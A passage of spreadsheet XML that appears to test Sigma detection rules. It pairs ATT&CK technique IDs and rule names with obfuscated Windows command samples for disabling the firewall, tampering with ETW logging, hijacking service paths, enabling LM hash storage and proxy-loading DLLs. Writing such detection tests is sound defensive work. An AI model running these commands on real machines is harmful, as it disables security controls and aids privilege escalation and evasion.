      <c r="H3580" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3580" s="44" t="n"/>
      <c r="J3580" s="44" t="n"/>
      <c r="K3580" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3581" ht="15.75" customHeight="1" s="42">
      <c r="A3581" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B3581" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C3581" s="44" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3581" s="44" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E3581" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /A {REGSVR	"C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dll"}</t>
        </is>
      </c>
      <c r="F3581" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3581" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3581" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3581" s="44" t="n"/>
      <c r="J3581" s="44" t="n"/>
      <c r="K3581" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3582" ht="15.75" customHeight="1" s="42">
      <c r="A3582" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B3582" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C3582" s="44" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3582" s="44" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E3582" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /S /A {"REGSVR" "C:\AtomicRedTeam\atomics\T1218.008\src\Win32\T1218-2.dll"}</t>
        </is>
      </c>
      <c r="F3582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3582" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3582" s="44" t="n"/>
      <c r="J3582" s="44" t="n"/>
      <c r="K3582" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3583" ht="15.75" customHeight="1" s="42">
      <c r="A3583" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B3583" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C3583" s="44" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3583" s="44" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E3583" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe -f"T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F3583" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3583" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3583" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3583" s="44" t="n"/>
      <c r="J3583" s="44" t="n"/>
      <c r="K3583" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3584" ht="15.75" customHeight="1" s="42">
      <c r="A3584" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B3584" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C3584" s="44" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3584" s="44" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E3584" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe	-f	"T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F3584" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3584" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3584" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3584" s="44" t="n"/>
      <c r="J3584" s="44" t="n"/>
      <c r="K3584" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3585" ht="15.75" customHeight="1" s="42">
      <c r="A3585" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B3585" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C3585" s="44" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3585" s="44" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E3585" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.txt"</t>
        </is>
      </c>
      <c r="F3585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3585" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3585" s="44" t="n"/>
      <c r="J3585" s="44" t="n"/>
      <c r="K3585" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3586" ht="15.75" customHeight="1" s="42">
      <c r="A3586" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B3586" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C3586" s="44" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3586" s="44" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E3586" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe "-f" "T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F3586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3586" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3586" s="44" t="n"/>
      <c r="J3586" s="44" t="n"/>
      <c r="K3586" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3587" ht="15.75" customHeight="1" s="42">
      <c r="A3587" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3587" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C3587" s="44" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D3587" s="44" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E3587" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {Set-NetFirewallProfile -Enabled $false -All}"</t>
        </is>
      </c>
      <c r="F3587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3587" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3587" s="44" t="n"/>
      <c r="J3587" s="44" t="n"/>
      <c r="K3587" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3588" ht="15.75" customHeight="1" s="42">
      <c r="A3588" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3588" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C3588" s="44" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D3588" s="44" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E3588" s="44" t="inlineStr">
        <is>
          <t>powershell_ise.exe -Command "Set-NetFirewallProfile -Enabled:$false -Domain"</t>
        </is>
      </c>
      <c r="F3588" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3588" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3588" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3588" s="44" t="n"/>
      <c r="J3588" s="44" t="n"/>
      <c r="K3588" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3589" ht="15.75" customHeight="1" s="42">
      <c r="A3589" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3589" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C3589" s="44" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D3589" s="44" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E3589" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-NetFirewallProfile -Enabled $false  -Private"</t>
        </is>
      </c>
      <c r="F3589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3589" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3589" s="44" t="n"/>
      <c r="J3589" s="44" t="n"/>
      <c r="K3589" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3590" ht="15.75" customHeight="1" s="42">
      <c r="A3590" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3590" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_modification_cmdline</t>
        </is>
      </c>
      <c r="C3590" s="44" t="inlineStr">
        <is>
          <t>ETW Logging Tamper In .NET Processes Via CommandLine</t>
        </is>
      </c>
      <c r="D3590" s="44" t="inlineStr">
        <is>
          <t>41421f44-58f9-455d-838a-c398859841d4</t>
        </is>
      </c>
      <c r="E3590" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set COMPlus^;_ETWEnabled=0 &amp;&amp; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"</t>
        </is>
      </c>
      <c r="F3590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3590" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3590" s="44" t="n"/>
      <c r="J3590" s="44" t="n"/>
      <c r="K3590" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3591" ht="15.75" customHeight="1" s="42">
      <c r="A3591" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3591" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_modification_cmdline</t>
        </is>
      </c>
      <c r="C3591" s="44" t="inlineStr">
        <is>
          <t>ETW Logging Tamper In .NET Processes Via CommandLine</t>
        </is>
      </c>
      <c r="D3591" s="44" t="inlineStr">
        <is>
          <t>41421f44-58f9-455d-838a-c398859841d4</t>
        </is>
      </c>
      <c r="E3591" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$env:DOTNET_ETWEnabled=0; Start-Process C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"</t>
        </is>
      </c>
      <c r="F3591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3591" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3591" s="44" t="n"/>
      <c r="J3591" s="44" t="n"/>
      <c r="K3591" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3592" ht="15.75" customHeight="1" s="42">
      <c r="A3592" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B3592" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C3592" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D3592" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E3592" s="44" t="inlineStr">
        <is>
          <t>sc.exe "config" "binpath"= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F3592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3592" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3592" s="44" t="n"/>
      <c r="J3592" s="44" t="n"/>
      <c r="K3592" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3593" ht="15.75" customHeight="1" s="42">
      <c r="A3593" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B3593" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C3593" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D3593" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E3593" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe c^onfig b^inPath= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F3593" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3593" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3593" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3593" s="44" t="n"/>
      <c r="J3593" s="44" t="n"/>
      <c r="K3593" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3594" ht="15.75" customHeight="1" s="42">
      <c r="A3594" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B3594" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C3594" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D3594" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E3594" s="44" t="inlineStr">
        <is>
          <t>sc.exe config service_name binPath= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F3594" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3594" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3594" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3594" s="44" t="n"/>
      <c r="J3594" s="44" t="n"/>
      <c r="K3594" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3595" ht="15.75" customHeight="1" s="42">
      <c r="A3595" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B3595" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C3595" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D3595" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E3595" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[WmiClass]'Win32_Service' | Where-Object {$_.Name -eq 'BenignService'} | Invoke-Method -Name SetSecurityDescriptor -ArgumentList ..."</t>
        </is>
      </c>
      <c r="F3595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3595" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3595" s="44" t="n"/>
      <c r="J3595" s="44" t="n"/>
      <c r="K3595" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3596" ht="15.75" customHeight="1" s="42">
      <c r="A3596" s="44" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B3596" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C3596" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D3596" s="44" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E3596" s="44" t="inlineStr">
        <is>
          <t>sc.exe config "BITS" start= disabled</t>
        </is>
      </c>
      <c r="F3596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3596" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3596" s="44" t="n"/>
      <c r="J3596" s="44" t="n"/>
      <c r="K3596" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3597" ht="15.75" customHeight="1" s="42">
      <c r="A3597" s="44" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B3597" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_tamper</t>
        </is>
      </c>
      <c r="C3597" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Service Tampering</t>
        </is>
      </c>
      <c r="D3597" s="44" t="inlineStr">
        <is>
          <t>ce72ef99-22f1-43d4-8695-419dcb5d9330</t>
        </is>
      </c>
      <c r="E3597" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Service -Name '*BITS*' | Set-Service -Status Stopped"</t>
        </is>
      </c>
      <c r="F3597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3597" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3597" s="44" t="n"/>
      <c r="J3597" s="44" t="n"/>
      <c r="K3597" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3598" ht="15.75" customHeight="1" s="42">
      <c r="A3598" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3598" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C3598" s="44" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D3598" s="44" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E3598" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v NoLMHash /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F3598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3598" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3598" s="44" t="n"/>
      <c r="J3598" s="44" t="n"/>
      <c r="K3598" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3599" ht="15.75" customHeight="1" s="42">
      <c r="A3599" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3599" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C3599" s="44" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D3599" s="44" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E3599" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM:System\CurrentControlSet\Control\Lsa" /v NoLMHash /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F3599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3599" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3599" s="44" t="n"/>
      <c r="J3599" s="44" t="n"/>
      <c r="K3599" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3600" ht="15.75" customHeight="1" s="42">
      <c r="A3600" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3600" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C3600" s="44" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D3600" s="44" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E3600" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM:System\CurrentControlSet\Control\Lsa" /vNoLMHash /tREG_DWORD /d0 /f</t>
        </is>
      </c>
      <c r="F3600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3600" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3600" s="44" t="n"/>
      <c r="J3600" s="44" t="n"/>
      <c r="K3600" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3601" ht="15.75" customHeight="1" s="42">
      <c r="A3601" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3601" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C3601" s="44" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D3601" s="44" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E3601" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM:System\CurrentControlSet\Control\Lsa" /f /v NoLMHash /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F3601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3601" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3601" s="44" t="n"/>
      <c r="J3601" s="44" t="n"/>
      <c r="K3601" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3602" ht="15.75" customHeight="1" s="42">
      <c r="A3602" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3602" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C3602" s="44" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D3602" s="44" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E3602" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM:System\CurrentControlSet\Control\Lsa" /v NoLMHash /t REG_DWORD /d "0" /f</t>
        </is>
      </c>
      <c r="F3602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3602" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3602" s="44" t="n"/>
      <c r="J3602" s="44" t="n"/>
      <c r="K3602" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3603" ht="15.75" customHeight="1" s="42">
      <c r="A3603" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3603" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C3603" s="44" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D3603" s="44" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E3603" s="44" t="inlineStr">
        <is>
          <t>Rundll32.exe "apphelp".dll,ShimFlushCache</t>
        </is>
      </c>
      <c r="F3603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3603" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3603" s="44" t="n"/>
      <c r="J3603" s="44" t="n"/>
      <c r="K3603" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3604" ht="15.75" customHeight="1" s="42">
      <c r="A3604" s="44" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B3604" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_non_priv_reg_or_ps</t>
        </is>
      </c>
      <c r="C3604" s="44" t="inlineStr">
        <is>
          <t>Non-privileged Usage of Reg or Powershell</t>
        </is>
      </c>
      <c r="D3604" s="44" t="inlineStr">
        <is>
          <t>8f02c935-effe-45b3-8fc9-ef8696a9e41d</t>
        </is>
      </c>
      <c r="E3604" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Servi*' -Name ('Image' + 'Path') -Value 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F3604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3604" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3604" s="44" t="n"/>
      <c r="J3604" s="44" t="n"/>
      <c r="K3604" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3605" ht="15.75" customHeight="1" s="42">
      <c r="A3605" s="44" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3605" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3605" s="44" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3605" s="44" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3605" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe /Path "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll"</t>
        </is>
      </c>
      <c r="F3605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3605" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3605" s="44" t="n"/>
      <c r="J3605" s="44" t="n"/>
      <c r="K3605" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3606" ht="15.75" customHeight="1" s="42">
      <c r="A3606" s="44" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3606" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3606" s="44" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3606" s="44" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3606" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe -p"a"th "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll"</t>
        </is>
      </c>
      <c r="F3606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3606" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3606" s="44" t="n"/>
      <c r="J3606" s="44" t="n"/>
      <c r="K3606" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3607" ht="15.75" customHeight="1" s="42">
      <c r="A3607" s="44" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3607" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3607" s="44" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3607" s="44" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3607" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe -Path "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.tmp"</t>
        </is>
      </c>
      <c r="F3607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3607" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3607" s="44" t="n"/>
      <c r="J3607" s="44" t="n"/>
      <c r="K3607" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3608" ht="15.75" customHeight="1" s="42">
      <c r="A3608" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B3608" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C3608" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D3608" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E3608" s="44" t="inlineStr">
        <is>
